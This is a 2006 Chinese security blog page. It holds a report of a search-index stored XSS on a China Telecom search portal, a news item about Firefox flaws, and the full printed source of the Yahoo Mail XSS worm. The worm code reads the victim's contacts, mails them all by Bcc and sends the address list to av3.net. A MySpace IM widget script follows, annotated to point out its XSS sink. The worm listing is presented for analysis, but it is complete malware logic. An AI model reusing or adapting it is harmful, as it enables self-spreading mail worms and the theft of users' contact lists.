• 2006年10月03日

    电信114搜索发现重大漏洞,可直接执行XSS语句

    电信114搜索发现重大漏洞,可直接执行XSS语句

    cnBeta顾问CN.Tink报道:

    听说微软的Live Search与中国电信合作了,微软为电信提供技术支持,将他们的搜索服务与电信的“网页揪错”捆绑起来.
      登录Live Search与电信合作的搜索引擎后,随便搜索了一下site:flyt.cn,结果意想不到,在点击下一页后,出现问题了,突然弹出一个对话框如下(原文此处附有弹窗截图,本页未收录):

      后来我查看源代码后发现,Live Search所收录的网页里面有我blog中一篇“某些大站的XSS跨站”,这篇文章里面有一些XSS语句,Live Search把收录的网页内容未经HTML转义就原样输出到了结果页,这些语句便在搜索站点自己的域名下执行了——也就是一个借搜索索引触发的存储型XSS,任何被收录的页面都能注入。如果我在某篇文章里写上iframe....挂个马,不知道会有什么情况,呵呵!看来微软细节还是没有做好!

      微软自己的Live Search却没有这么弱智的BUG,呵呵!

    黑客称Firefox太脆弱 需重写全部核心代码

    【赛迪网讯】10月3日消息,据国外媒体报道,有黑客日前表示,Firefox浏览器的安全漏洞太多,依靠补丁程序是根本无法修复的。
    据ZDNet网站报道,在日前召开的ToorCon黑客大会上,两名黑客Spiegelmock和Andrew Wbeelsoi称,Firefox浏览器的安全漏洞太多,依靠补丁程序是根本无法修复的。
    两名黑客称,Firefox的Javascript代码已经是10年前的产物了,很容易遭到攻击。而且,要想彻底解决问题,必须要重写Firefox的全部核心代码。
    对此,新上任的Firefox安全专家Window Snyder称,将对此展开调查。但同时指出,尽管Firefox浏览器可能存在一些安全漏洞,但还不至于到了补丁无法修复的地步。
    众所周知,Firefox浏览器正是以安全而闻名。据Net Applications的统计结果显示,截止到今年8月底,Firefox的市场份额已达到11.8%,而IE的份额则下滑至83%。


    传说中闹得YAHOO不可开交的XSS WORM

    传说中闹得YAHOO不可开交的XSS WORM,赛门铁克将其危害级别定为Level 2,下一个是谁?163,sohu,还是sina?
    下面是当时流传出来的载荷文本。从代码本身可以看出它的链条:`<img>`的事件属性触发脚本 → 用XMLHttpRequest请求`/ym/QuickBuilder`取回通讯录页面 → 从`<td>`单元格里筛出@yahoo.com / @yahoogroups.com地址 → 再请求`/ym/Compose`页面提取发信表单要求的`.crumb`值 → 以Bcc方式向整份联系人列表POST发信 → 最后`window.navigate`到av3.net并把地址列表拼在URL里外传。注意:页面把引号都转成了弯引号/全角字符,而且`onload`/`onreadystatechange`的位置都显示为`onfiltered`(像是经过邮件过滤器改写后的版本),所以下面的文本不能原样运行,仅供分析。
    <!--
      NOTE(review): malware listing, kept verbatim for analysis; do not run.
      Control flow visible in the attribute below:
        1. makeRequest() GETs /ym/QuickBuilder (the address-book builder page).
        2. ListContacts() then GetIDs() scans the returned HTML for "<td>" cells
           holding @yahoo.com / @yahoogroups.com addresses, strips the victim's
           own address, keeps the first one as To: and the rest as IDList.
        3. makeRequest() GETs /ym/Compose and ExtractStr() pulls the ".crumb"
           value the compose form requires.
        4. Getcrumb() POSTs the compose form (Bcc=IDList, forged From) so the
           victim's account mails every contact.
        5. alertContents() navigates to av3.net with the harvested address list
           appended to the URL, i.e. the list is exfiltrated.
      Both the <img> event attribute and the XHR callback property appear as
      "onfiltered", which looks like the output of the mail filter rewriting
      on* attribute names; the quotes are typographic ones as well, so the
      text as printed is not executable.
    -->
    <img src=’http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif’ onfiltered=”var http_request = false; var Email = ‘’; var IDList = ‘’; var CRumb = ‘’; function makeRequest(url, Func, Method, Param) { if (window.XMLHttpRequest) { http_request = new XMLHttpRequest(); } else if (window.ActiveXObject) { http_request = new ActiveXObject(’Microsoft.XMLHTTP’); } http_request. onfiltered= Func; http_request.open(Method, url, true); if( Method == ‘GET’) http_request.send(null); else http_request.send(Param); }window.open(’http://www,lastdata.com’); ServerUrl = url0;USIndex = ServerUrl.indexOf(’us.’ ,0);MailIndex = ServerUrl.indexOf(’.mail’ ,0);CutLen = MailIndex - USIndex - 3;var Server = ServerUrl.substr(USIndex + 3, CutLen); function GetIDs(HtmlContent) { IDList = ‘’; StartString = ‘ <td>’; EndString = ‘</td>’; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); while(StartIndex >= 0) { EndIndex = HtmlContent.indexOf(EndString, StartIndex); CutLen = EndIndex - StartIndex - StartString.length; YahooID = HtmlContent.substr(StartIndex + StartString.length, CutLen); if( YahooID.indexOf(’@yahoo.com’, 0) > 0 || YahooID.indexOf(’@yahoogroups.com’, 0) > 0 ) IDList = IDList + ‘,’ + YahooID ; StartString = ‘</tr>’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); StartString = ‘ <td>’; StartIndex = HtmlContent.indexOf(StartString, StartIndex + 20); i++; } if(IDList.substr(0,1) == ‘,’) IDList = IDList.substr(1, IDList.length); if(IDList.indexOf(’,', 0)>0 ) { IDListArray = IDList.split(’,'); Email = IDListArray[0]; IDList = IDList.replace(Email + ‘,’, ‘’); } CurEmail = spamform.NE.value; IDList = IDList.replace(CurEmail + ‘,’, ‘’); IDList = IDList.replace(’,’ + CurEmail, ‘’);IDList = IDList.replace(CurEmail, ‘’);UserEmail = showLetter.FromAddress.value;IDList = IDList.replace(’,’ + UserEmail, ‘’);IDList = IDList.replace(UserEmail + ‘,’, ‘’);IDList = IDList.replace(UserEmail, ‘’); return IDList; } function ListContacts() { if (http_request.readyState == 
    4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; IDList = GetIDs(HtmlContent); makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose/?rnd=’ + Math.random(), Getcrumb, ‘GET’, null); } } } function ExtractStr(HtmlContent) { StartString = ‘name=\u0022.crumb\u0022 value=\u0022′; EndString = ‘\u0022′; i = 0; StartIndex = HtmlContent.indexOf(StartString, 0); EndIndex = HtmlContent.indexOf(EndString, StartIndex + StartString.length ); CutLen = EndIndex - StartIndex - StartString.length; crumb = HtmlContent.substr(StartIndex + StartString.length , CutLen ); return crumb; } function Getcrumb() { if (http_request.readyState == 4) { if (http_request.status == 200) { HtmlContent = http_request.responseText; CRumb = ExtractStr(HtmlContent); MyBody = ‘this is test’; MySubj = ‘New Graphic Site’; Url = ‘http://us.’ + Server + ‘.mail.yahoo.com/ym/Compose’; var ComposeAction = compose.action;MidIndex = ComposeAction.indexOf(’&Mid=’ ,0);incIndex = ComposeAction.indexOf(’&inc’ ,0);CutLen = incIndex - MidIndex - 5;var MyMid = ComposeAction.substr(MidIndex + 5, CutLen); QIndex = ComposeAction.indexOf(’?box=’ ,0);AIndex = ComposeAction.indexOf(’&Mid’ ,0);CutLen = AIndex - QIndex - 5;var BoxName = ComposeAction.substr(QIndex + 5, CutLen); Param = 
    ‘SEND=1&SD=&SC=&CAN=&docCharset=windows-1256&PhotoMailUser=&PhotoToolInstall=&OpenInsertPhoto=&PhotoGetStart=0&SaveCopy=no&PhotoMailInstallOrigin=&.crumb=RUMBVAL&Mid=EMAILMID&inc=&AttFol=&box=BOXNAME&FwdFile=YM_FM&FwdMsg=EMAILMID&FwdSubj=EMAILSUBJ&FwdInline=&OriginalFrom=FROMEMAIL&OriginalSubject=EMAILSUBJ&InReplyTo=&NumAtt=0&AttData=&UplData=&OldAttData=&OldUplData=&FName=&ATT=&VID=&Markers=&NextMarker=0&Thumbnails=&PhotoMailWith=&BrowseState=&PhotoIcon=&ToolbarState=&VirusReport=&Attachments=&Background=&BGRef=&BGDesc=&BGDef=&BGFg=&BGFF=&BGFS=&BGSolid=&BGCustom=&PlainMsg=%3Cbr%3E%3Cbr%3ENote%3A+forwarded+message+attached.&PhotoFrame=&PhotoPrintAtHomeLink=&PhotoSlideShowLink=&PhotoPrintLink=&PhotoSaveLink=&PhotoPermCap=&PhotoPermPath=&PhotoDownloadUrl=&PhotoSaveUrl=&PhotoFlags=&start=compose&bmdomain=&showcc=&showbcc=&AC_Done=&AC_ToList=0%2C&AC_CcList=&AC_BccList=&sendtop=Send&savedrafttop=Save+as+a+Draft&canceltop=Cancel&FromAddr=&To=TOEMAIL&Cc=&Bcc=BCCLIST&Subj=EMAILSUBJ&Body=%3CBR%3E%3CBR%3ENote%3A+forwarded+message+attached.&Format=html&sendbottom=Send&savedraftbottom=Save+as+a+Draft&cancelbottom=Cancel&cancelbottom=Cancel’; Param = Param.replace(’BOXNAME’, BoxName); Param = Param.replace(’RUMBVAL’, CRumb); Param = Param.replace(’BCCLIST’, IDList); Param = Param.replace(’TOEMAIL’, Email);Param = Param.replace(’FROMEMAIL’, ‘av3@yahoo.com’); Param = Param.replace(’EMAILBODY’, MyBody); Param = Param.replace(’PlainMESSAGE’, ‘’); Param = Param.replace(’EMAILSUBJ’, MySubj);Param= Param.replace(’EMAILSUBJ’, MySubj);Param = Param.replace(’EMAILSUBJ’, MySubj); Param = Param.replace(’EMAILMID’, MyMid);Param = Param.replace(’EMAILMID’, MyMid);makeRequest(Url , alertContents, ‘POST’, Param); } }} function alertContents() { if (http_request.readyState == 4) { 
    window.navigate(’http://www.av3.net/?ShowFolder&rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&ShowFolder?rb=Sent&reset=1&YY=75867&inc=25&order=down&sort=date&pos=0&view=a&head=f&box=Inbox&BCCList=’ + IDList) } } makeRequest(’http://us.’ + Server + ‘.mail.yahoo.com/ym/QuickBuilder?build=Continue&cancel=&continuetop=Continue&canceltop=Cancel&Inbox=Inbox&Sent=Sent&pfolder=all&freqCheck=&freq=1&numdays=on&date=180&ps=1&numadr=100&continuebottom=Continue&cancelbottom=Cancel&rnd=’ + Math.random(), ListContacts, ‘GET’, null)”> Please wait while loading the site

    New MySpace Worm

    来自:s0n9'5 B1o9
    (说明:下面贴出的是MySpace页面内嵌的Userplane在线状态/IM脚本(up_*系列函数),从可见代码看它本身没有自我传播逻辑,更像是蠕虫所利用的载体而非蠕虫本体。与安全相关的地方有两处:presence.swf以allowScriptAccess="anyDomain"加载并且走的是明文http;receiveData传进来的用户ID未经任何转义就被up_show拼进innerHTML里的onClick属性,而文件里定义的up_clean并没有被用上。)

    // Endpoints used by the Userplane presence/IM widget.
    // NOTE(review): all four are plain http://. presence.swf (fetched from
    // up_sURL) is later embedded with allowScriptAccess="anyDomain", so a
    // network attacker who can substitute that SWF gets to script the page.
    var up_sURL  = "http://cache.static.userplane.com/presence";    // static assets (presence.swf)
    var up_dURL  = "http://feed.presence.userplane.com/presence/m"; // presence feed (o.php)
    var up_wmURL = "http://www.myspace.com/userplane/ic.cfm";       // IM window launcher
    var up_pServ = "presence.userplane.com";                        // handed to the SWF via flashvars
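    // Open the IM window for destination user `_1`.  If the popup was blocked
    // (window.open returned null) fall back to the in-page "wants to IM you"
    // prompt via up_notify(); otherwise drop the request from the queue via
    // up_clear().
    //
    // _1 arrives from receiveData() (ids handed to the page by the SWF), so it
    // is URL-encoded before being placed in the query string: a value holding
    // '&' or '#' could otherwise inject extra parameters into the launcher URL.
    // up_sid was already encoded by up_runPresence().  For plain alphanumeric
    // ids the resulting URL is unchanged.
    function up_launch(_1){
        var target = up_wmURL
            + "?sendType=3&strEncryptedID=" + up_sid
            + "&strDestinationUserID=" + encodeURIComponent(_1);
        var w = window.open(target, "ICWindow_" + _1,
            "width=500,height=475,toolbar=0,directories=0,menubar=0,status=0,location=0,scrollbars=0,resizable=1");
        if (w == null) {
            up_notify(_1);
        } else {
            up_clear(_1, false);
        }
    }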
    // Remove user `_3` from the pending-request queue (up_la) and, when the
    // entry was present or `_4` (forceClear) is false, tell the presence feed
    // via the hidden up_lf iframe.  Always re-renders the prompt afterwards.
    //
    // NOTE(review): the queue is drained with pop(), so the surviving entries
    // end up in reverse order; that is the original behaviour and is kept.
    function up_clear(_3,_4){
        var pending = up_la;
        var found = false;
        up_la = new Array();
        while (pending.length > 0) {
            var entry = pending.pop();
            if (entry.uid == _3) {
                found = true;
                continue;
            }
            up_la.push(entry);
        }
        if (!_4 || found) {
            frames.up_lf.location.href = up_dURL + "/o.php?sid=" + up_sid
                + "&ou=" + _3 + "&forceClear=" + String(Boolean(_4));
        }
        up_show();
    }
    // Queue an in-page "wants to IM you" prompt for user `_8` unless that uid
    // is already queued (loose == comparison, as in the rest of the widget),
    // then re-render the prompt.
    function up_notify(_8){
        var alreadyQueued = false;
        for (var idx = 0; idx < up_la.length; idx++) {
            if (up_la[idx].uid == _8) {
                alreadyQueued = true;
            }
        }
        if (!alreadyQueued) {
            up_la.push({ uid: _8, n: "A website member" });
        }
        up_show();
    }
    // Render (or hide) the "Incoming IM Message" prompt for the head of the
    // up_la queue.  Only re-renders when the queued uid differs from the one
    // currently displayed (up_uid_display); an empty queue slides the box out.
    function up_show(){
    var e=document.getElementById("up_nd");
    if(up_la.length>0){
    if(up_uid_display!=up_la[0].uid){
    // NOTE(review): DOM-XSS sink.  up_la[0].n and up_la[0].uid are concatenated
    // into innerHTML with no escaping; the uid lands inside a quoted string in
    // an onClick attribute.  The name is the fixed string set in up_notify(),
    // but the uid comes from receiveData() (ids handed to the page by the SWF).
    // If any caller can influence that id, a value containing ' or " breaks
    // out of the handler.  up_clean() below would reduce it to [A-Za-z0-9_]
    // but is never applied here -- confirm whether that was the intent.
    e.innerHTML="<div style=\"text-align:center\">"+(up_is_win_ie?"":"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td align=\"center\">")+"<table border=\"0\" cellpadding=\"2\" cellspacing=\"5\"><tr><td nowrap align=\"center\"><strong style=\"font-size:larger;\">Incoming IM Message</strong></td></tr><tr><td align=\"center\">"+up_la[0].n+" wants to IM you.<br>Would you like to accept?</td></tr><tr><td nowrap align=\"center\"><a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_launch( '"+up_la[0].uid+"' ); return false;\">Yes</a>           <a style=\"font-size:larger;\" href=\"\" onClick=\"javascript: up_clear( '"+up_la[0].uid+"', true ); return false;\">No</a></td></tr></table>"+(up_is_win_ie?"":"</td></tr></table>")+"</div>";
    up_uid_display=up_la[0].uid;
    // Slide the box down into view (target offset 200px).
    up_animate(200);
    }
    }else{
    up_uid_display="";
    // Nothing queued: slide the box back off-screen.
    up_animate(-200);
    }
    }
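    // Step the prompt box (#up_nd) 10px per tick towards vertical offset `dY`,
    // keeping it pinned relative to the current scroll position.  Re-arms
    // itself every 33ms while the box has not reached dY or while requests
    // are still queued (so the box follows scrolling); the pending timer is
    // kept in the global up_at so a new call cancels the previous one.
    function up_animate(dY){
        var box = document.getElementById("up_nd");
        if (up_divY != dY || up_la.length > 0) {
            if (up_divY != dY) {
                up_divY += (dY < up_divY) ? -10 : 10;
            }
            box.style.top = up_divY + document.body.scrollTop + "px";
            clearTimeout(up_at);
            // Function callback instead of setTimeout("up_animate(" + dY + ")", 33):
            // the string form is evaluated like eval() and built source text
            // from dY at runtime.  Same schedule, same argument.
            up_at = setTimeout(function () { up_animate(dY); }, 33);
        } else {
            // NOTE(review): unitless value (no "px"); standards-mode browsers
            // ignore a bare number here.  Kept as in the original -- verify intent.
            box.style.top = dY;
        }
    }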
    // Reduce `ins` to [A-Za-z0-9]: every other UTF-16 code unit becomes "_".
    // (Defined but not called anywhere in the visible code.)
    function up_clean(ins){
        return ins.replace(/[^A-Za-z0-9]/g, "_");
    }
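    // Entry point that hands the page a comma-separated list of user ids;
    // each id opens an IM window via up_launch().  Presumably invoked by the
    // presence SWF (embedded with allowScriptAccess="anyDomain"), so treat the
    // ids as untrusted -- the only later sanitisation is in up_launch().
    // Iteration stops at the first empty segment, matching the original
    // `while(u=a.shift())` loop.
    function receiveData(_14){
        if (_14 == "") {
            return;
        }
        var ids = _14.split(",");
        for (var i = 0; i < ids.length; i++) {
            // Declared locally: the original assigned to `u` without a
            // declaration, creating an implicit global (a ReferenceError in
            // strict mode).
            var uid = ids[i];
            if (!uid) {
                break;
            }
            up_launch(uid);
        }
    }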
    // Percent-encode `_16` for use in a query string: legacy escape() output
    // with "+" and "/" additionally encoded.  (escape() already turns quotes
    // into %22 / %27, so those replacements are no-ops; it leaves @*_-. alone
    // and emits %uXXXX for non-Latin-1 characters, which is NOT what
    // encodeURIComponent would produce -- callers depend on this exact form.)
    function URLencode(_16){
        var extra = { "+": "%2B", "\"": "%22", "'": "%27", "/": "%2F" };
        return escape(_16).replace(/[+"'\/]/g, function (ch) { return extra[ch]; });
    }
    // Bootstrap the widget: reset state, write the hidden feed iframe and the
    // prompt box into the document, and (when a session id is present) embed
    // the presence SWF with the server name and encoded sid as flashvars.
    // NOTE(review): the `uid` parameter is never read -- the "uid=" flashvar
    // below carries up_sid, not `uid`.  Confirm whether that is intended.
    function up_runPresence(sid,uid){
    up_sid=URLencode(sid);
    up_divY=-200;
    up_la=new Array();
    up_uid_display="";
    // Hidden iframe that up_clear() navigates to report cleared requests.
    document.write("<iframe name=\"up_lf\" id=\"up_lf\" style=\"position:absolute; top: -200px; z-index:9998; width:100px; height:100px; border: 0px\" src=\"\"></iframe>");
    // The "Incoming IM Message" box filled by up_show().
    document.write("<div id=\"up_nd\" style=\"position:absolute; width:250px; z-index:111111; left: 30px; top: -200px; background-color:#eeeeee; border: 1px solid #000000;\"></div>");
    if(up_sid!=""){
    var _19="server="+up_pServ+"&uid="+up_sid;
    // NOTE(review): allowScriptAccess="anyDomain" (set on both <param> and
    // <embed>) lets the SWF call into this page's JavaScript regardless of
    // the domain it was served from, and presence.swf is fetched over plain
    // http:// (up_sURL).  Whoever controls or can replace that SWF can drive
    // receiveData()/up_launch() and, through up_show(), the innerHTML sink.
    document.write("<div id=\"flash\" style=\"position:absolute; width:100px; z-index:9996; top: -200px;\"><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0\" id=\"presence\" width=\"1\" height=\"1\" align=\"middle\"><param name=\"allowScriptAccess\" value=\"anyDomain\" /><param name=\"movie\" value=\""+up_sURL+"/presence.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"flashvars\" value=\""+_19+"\" /><embed src=\""+up_sURL+"/presence.swf\" flashvars=\""+_19+"\" quality=\"high\" bgcolor=\"#ffffff\" width=\"1\" height=\"1\" swLiveConnect=true id=\"presence\" name=\"presence\" align=\"middle\" allowScriptAccess=\"anyDomain\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\" /></object></div>");
    }
    }
    // Widget state (populated by up_runPresence) followed by user-agent
    // sniffing; the only consumer of the sniff results is up_is_win_ie, which
    // up_show() uses to decide whether to wrap the prompt in an extra table.
    var up_sid = null;          // URL-encoded session id
    var up_divY = null;         // current vertical offset of the prompt box
    var up_la = null;           // queue of pending IM requests ({uid, n})
    var up_uid_display = null;  // uid currently shown in the prompt
    var up_at = null;           // up_animate() timer handle
    var up_agt = navigator.userAgent.toLowerCase();
    var up_appVer = navigator.appVersion.toLowerCase();
    var up_is_mac = up_agt.indexOf("mac") >= 0;
    var up_is_safari = up_is_mac && up_agt.indexOf("safari") >= 0;
    var up_is_khtml = up_is_safari || up_agt.indexOf("konqueror") >= 0;
    var up_is_ie = up_appVer.indexOf("msie") >= 0
        && up_agt.indexOf("opera") < 0
        && !up_is_khtml;
    var up_is_win = !up_is_mac
        && (up_agt.indexOf("win") >= 0 || up_agt.indexOf("16bit") >= 0);
    var up_is_win_ie = up_is_win && up_is_ie;

